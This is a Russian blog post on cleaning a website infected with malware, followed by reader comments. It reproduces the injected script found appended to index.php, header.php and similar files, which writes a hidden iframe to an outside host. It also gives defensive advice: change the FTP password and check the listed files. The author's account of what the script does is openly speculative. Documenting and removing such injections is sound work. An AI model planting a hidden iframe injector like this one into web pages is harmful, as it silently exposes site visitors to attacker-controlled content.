Что делать, если на сайте появился вирус. Как проверить сайт?
Недавно один мой сайт подхватил вирус. Файлы на сервере были инфицированы, в конце каждого был дописан исполняемый скрипт.
Скрипт примерно следующего содержания:
<script language=javascript>status=location;document.write
(’<iframe src=”hххp://online-channels.info/in.cgi?traf” width=0
height=0 frameborder=0 display:none onLoad=”status=defaultStatus;”>
</iframe>’);</script>
Скрипт встретился (может встречаться) в следующих файлах.
* index.php
* index.html
* main.php
* header.php
* footer.php
* login.php
Что он делает?
Я могу только предположить. Код вызывает скрит на сайте online-channels.info (возможно могут быть и другие сайты). Были случаи, что у пользователей сильно загружался процессор, компьютер перегружался. Антивирусная программа также реагировала на наличие вируса. Может это разновидность интернет шпионажа. Для себя понял, что лучше иметь связку из антивируса и фаервола.
Откуда он взялся?
Он мог попасть через уязвимость на сервере хостинга. Возможно пароли от FTP могли быть похищены и специальной программой автоматом прописывались данные скрипты в конце вышеназванных файлов.
Как это обнаружить?
Во-первых сработает антивирус. Во-вторых, для отслеживания, я использую дополнение к Firefox под названием Firebug. Оно позволяет отследить запросы, поступающие с данного сайта. На скриншоте видно, что сайт рвется во множество мест, причем не опознанных, т.е. куда он совсем не должен рваться (выделено цветом).
Что делать?
Смените пароль на фтп и обязательно проверьте index.php, index.html, index.htm, main.php, header.php, footer.php, login.php, если таковые имеются на сервере, на наличие посторонних строк в коде. Бытовые акустические системы вы можете посмотреть на сайте Мьюзик Энджел.
Смотрите также статью ”Сайт заражен вирусом, внизу файла код iframe”
Оставить комментарий
сидела в контакте,пришло сообщение защищенное,я тупанула,открыла,последствия таковы,ни контакт,ни однокласники,ни маил,ни яндекс не открываются(не зайти на личн.страницу),яотку сохраненную в файле нет,ее не удалить никак,антивирус пропал...что делать? что и как скачать?
аналогичная ситуация. только антивирус не реагирует!!! может конечно это только пока...
и все же неясно, какую цель они преследуют?
Оставить комментарий